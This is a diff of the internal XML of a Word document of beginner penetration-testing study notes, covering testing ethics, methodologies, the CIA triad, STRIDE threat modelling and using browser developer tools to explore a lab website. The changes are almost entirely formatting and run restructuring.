--- a/JrPentest.docx
+++ b/JrPentest.docx
@@ -4,15 +4,10 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>A --PENTESTING FUNDAMENTALS</w:t>
@@ -31,23 +26,7 @@
           <w:bCs/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>1-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t xml:space="preserve">What is Penetration </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Testing:</w:t>
+        <w:t>1-What is Penetration Testing:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -60,7 +39,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> (finding vulnerabilities in a clients application or system).</w:t>
+        <w:t xml:space="preserve"> (finding vulnerabilities in a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>clients</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> application or system).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -140,19 +127,7 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>2-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Penetration Testing Ethics</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>2-Penetration Testing Ethics:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -484,19 +459,7 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>3-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Penetration Testing Methodologies</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>3-Penetration Testing Methodologies:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -574,7 +537,21 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>The Open Source Security Testing Methodology Manual</w:t>
+          <w:t xml:space="preserve">The </w:t>
+        </w:r>
+        <w:proofErr w:type="gramStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>Open Source</w:t>
+        </w:r>
+        <w:proofErr w:type="gramEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Security Testing Methodology Manual</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -800,12 +777,17 @@
         <w:t xml:space="preserve">is a popular framework used to improve an </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>organisations</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> cybersecurity standards and manage the risk of cyber threats. This framework is a bit of an </w:t>
+        <w:t xml:space="preserve"> cybersecurity standards</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and manage the risk of cyber threats. This framework is a bit of an </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -817,13 +799,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>The</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> framework provides guidelines on security controls &amp; benchmarks for success for </w:t>
+      <w:r>
+        <w:t xml:space="preserve">The framework provides guidelines on security controls &amp; benchmarks for success for </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -878,6 +855,7 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -890,7 +868,31 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>(National cyber Security Centre)</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">National </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cyber Security</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Centre)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1056,13 +1058,21 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>4-</w:t>
-      </w:r>
+        <w:t xml:space="preserve">4-Black box, White box, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>Black box, White box, Grey box Penetration Testing</w:t>
+        <w:t>Grey</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> box Penetration Testing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1080,6 +1090,9 @@
         <w:t>Black-Box Testing</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -1139,7 +1152,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:rect w14:anchorId="435F1BC8" id="Rectangle 19" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+              <v:rect w14:anchorId="4EDC6DBE" id="Rectangle 19" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
                 <o:lock v:ext="edit" aspectratio="t"/>
                 <w10:anchorlock/>
               </v:rect>
@@ -1209,6 +1222,9 @@
         <w:t>White-Box Testing</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -1268,7 +1284,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:rect w14:anchorId="6EE773C0" id="Rectangle 17" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+              <v:rect w14:anchorId="399E9D6F" id="Rectangle 17" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
                 <o:lock v:ext="edit" aspectratio="t"/>
                 <w10:anchorlock/>
               </v:rect>
@@ -1348,15 +1364,7 @@
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>B-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Principles of Security</w:t>
+        <w:t>B-Principles of Security</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1364,71 +1372,59 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>1-</w:t>
-      </w:r>
+        <w:t>1-Introduction</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The following room is going to outline some of the fundamental principles of information security. The frameworks used to protect data and systems to the elements of what exactly makes data secure.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The measures, frameworks and protocols discussed throughout this room all play a small part in "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Defence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in Depth."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Defence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in Depth is the use of multiple varied layers of security to an </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>organisation's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> systems and data in the hopes that multiple layers will provide redundancy in an </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>organisation's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> security perimeter.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>Introduction</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The following room is going to outline some of the fundamental principles of information security. The frameworks used to protect data and systems to the elements of what exactly makes data secure.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The measures, frameworks and protocols discussed throughout this room all play a small part in "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Defence</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> in Depth."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Defence</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> in Depth is the use of multiple varied layers of security to an </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>organisation's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> systems and data in the hopes that multiple layers will provide redundancy in an </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>organisation's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> security perimeter.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>2-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>The CIA Triad</w:t>
+        <w:t>2-The CIA Triad</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1655,13 +1651,7 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>3-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Principles of Privileges</w:t>
+        <w:t>3-Principles of Privileges</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1723,7 +1713,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>What is essential when discussing privilege and access controls is the principle of least privilege. Simply, users should be given the minimum amount of privileges, and only those that are absolutely necessary for them to perform their duties. Other people should be able to trust what people write to.</w:t>
+        <w:t xml:space="preserve">What is essential when discussing privilege and access controls is the principle of least privilege. Simply, users should be given the minimum </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>amount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of privileges, and only those that are absolutely necessary for them to perform their duties. Other people should be able to trust what people write to.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1736,13 +1734,7 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>4-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Security Models Continued</w:t>
+        <w:t>4-Security Models Continued</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1864,7 +1856,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>. Therefore, applicants who are successfully vetted are assumed to be trustworthy - which is where this model fits in.</w:t>
+        <w:t xml:space="preserve">. Therefore, applicants who are successfully vetted are assumed to be trustworthy - which is where </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>this model fits</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2001,13 +2001,7 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>5-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Threat Modelling &amp; Incident Response</w:t>
+        <w:t>5-Threat Modelling &amp; Incident Response</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2030,6 +2024,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59CD4065" wp14:editId="4E2CC729">
             <wp:extent cx="1691050" cy="1131534"/>
@@ -2208,10 +2205,22 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t> T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ampering with data,</w:t>
+        <w:t> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ampering</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with data,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2311,7 +2320,15 @@
         <w:t>A</w:t>
       </w:r>
       <w:r>
-        <w:t>nalysis) infosec never tasted so good!. Let's detail STRIDE below. STRIDE, authored by two Microsoft security researchers in 1999 is still very relevant today. STRIDE includes six main principles, which I have detailed in the table below:</w:t>
+        <w:t xml:space="preserve">nalysis) infosec never tasted so </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>good!.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Let's detail STRIDE below. STRIDE, authored by two Microsoft security researchers in 1999 is still very relevant today. STRIDE includes six main principles, which I have detailed in the table below:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2366,6 +2383,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ACC9E42" wp14:editId="3497F9C5">
             <wp:extent cx="5943600" cy="1195070"/>
@@ -2577,15 +2597,7 @@
           <w:bCs/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>1-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Walking An Application</w:t>
+        <w:t>1-Walking An Application</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2601,15 +2613,25 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>a-</w:t>
-      </w:r>
+        <w:t xml:space="preserve">a-Walking </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>Walking An Application</w:t>
+        <w:t>An</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Application</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2699,13 +2721,21 @@
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>b-</w:t>
-      </w:r>
+        <w:t xml:space="preserve">b-Exploring </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>Exploring The Website</w:t>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Website</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2773,13 +2803,21 @@
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>c-</w:t>
-      </w:r>
+        <w:t xml:space="preserve">c-Viewing </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>Viewing The Page Source</w:t>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Page Source</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2789,15 +2827,36 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The returned code is made up of HTML ( </w:t>
+        <w:t xml:space="preserve">The returned code is made up of HTML </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">( </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>HyperText</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Markup Language), CSS ( Cascading Style Sheets ) and JavaScript, and it's what tells our browser what content to display, how to show it and adds an element of interactivity with JavaScript.</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Markup Language), CSS </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( Cascading</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Style </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Sheets )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and JavaScript, and it's what tells our browser what content to display, how to show it and adds an element of interactivity with JavaScript.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2838,7 +2897,15 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>view-source:https</w:t>
+        <w:t>view-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>source:https</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2848,6 +2915,7 @@
         </w:rPr>
         <w:t>://www.google.com/</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2872,12 +2940,36 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>At the top of the page, you'll notice some code starting with &lt;!-- and ending with --&gt; these are comments. Comments are messages left by the website developer, usually to explain something in the code to other programmers or even notes/reminders for themselves. These comments don't get displayed on the actual webpage. This comment describes how the homepage is temporary while a new one is in development. View the webpage in the comment to get your first flag.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Links to different pages in HTML are written in anchor tags ( these are HTML elements that start with &lt;a ), and the link that you'll be directed to is stored in the </w:t>
+        <w:t>At the top of the page, you'll notice some code starting with </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>&lt;!--</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t> and ending with --&gt; these are comments. Comments are messages left by the website developer, usually to explain something in the code to other programmers or even notes/reminders for themselves. These comments don't get displayed on the actual webpage. This comment describes how the homepage is temporary while a new one is in development. View the webpage in the comment to get your first flag.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Links to different pages in HTML are written in anchor tags </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( these</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are HTML elements that start with &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, and the link that you'll be directed to is stored in the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2895,6 +2987,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783B4F0A" wp14:editId="688E44B8">
             <wp:extent cx="5283200" cy="1308100"/>
@@ -2979,13 +3074,7 @@
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>d-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Developer Tools </w:t>
+        <w:t xml:space="preserve">d-Developer Tools </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3071,6 +3160,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B718DC" wp14:editId="0DE64698">
             <wp:extent cx="5943600" cy="3370580"/>
@@ -3123,11 +3215,38 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Right-clicking on the premium notice ( paywall ), you should be able to select the Inspect option from the menu, which opens the developer tools either on the bottom or right-hand side depending on your browser or preferences. You'll now see the elements/HTML that make up the website ( similar to the screenshots below ).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t xml:space="preserve">Right-clicking on the premium notice </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( paywall</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ), you should be able to select the Inspect option from the menu, which opens the developer tools either on the bottom or right-hand side depending on your browser or preferences. You'll now see the elements/HTML that make up the website </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( similar</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to the screenshots </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>below )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7641A961" wp14:editId="2164EF4F">
@@ -3231,7 +3350,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Many times when viewing </w:t>
+        <w:t xml:space="preserve">Many </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>times</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> when viewing </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3247,7 +3374,23 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">, which means all formatting ( tabs, spacing and newlines ) have been removed to make the file smaller. This file is no exception to this, and it has also been </w:t>
+        <w:t xml:space="preserve">, which means all formatting </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( tabs</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, spacing and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>newlines )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> have been removed to make the file smaller. This file is no exception to this, and it has also been </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3268,7 +3411,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> by using the "Pretty Print" option, which looks like two braces { } to make it a little more readable, although due to the </w:t>
+        <w:t xml:space="preserve"> by using the "Pretty Print" option, which looks like two braces </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>{ }</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to make it a little more readable, although due to the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3276,11 +3427,22 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>, it's still difficult to comprehend what is going on with the file. If you scroll to the bottom of the flash.min.js file, you'll see the line: flash['remove']();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>, it's still difficult to comprehend what is going on with the file. If you scroll to the bottom of the flash.min.js file, you'll see the line: flash['remove</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>'](</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70ABBF50" wp14:editId="2ECE6F93">
             <wp:extent cx="5943600" cy="2659380"/>
@@ -3389,24 +3551,18 @@
           <w:highlight w:val="magenta"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>f-</w:t>
+        <w:t xml:space="preserve">f-Developer Tools </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t xml:space="preserve">Developer Tools </w:t>
+        <w:t>–</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
         <w:t xml:space="preserve"> Network</w:t>
       </w:r>
     </w:p>
@@ -3437,6 +3593,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="760763E6" wp14:editId="77F284B4">
             <wp:extent cx="5943600" cy="3397250"/>
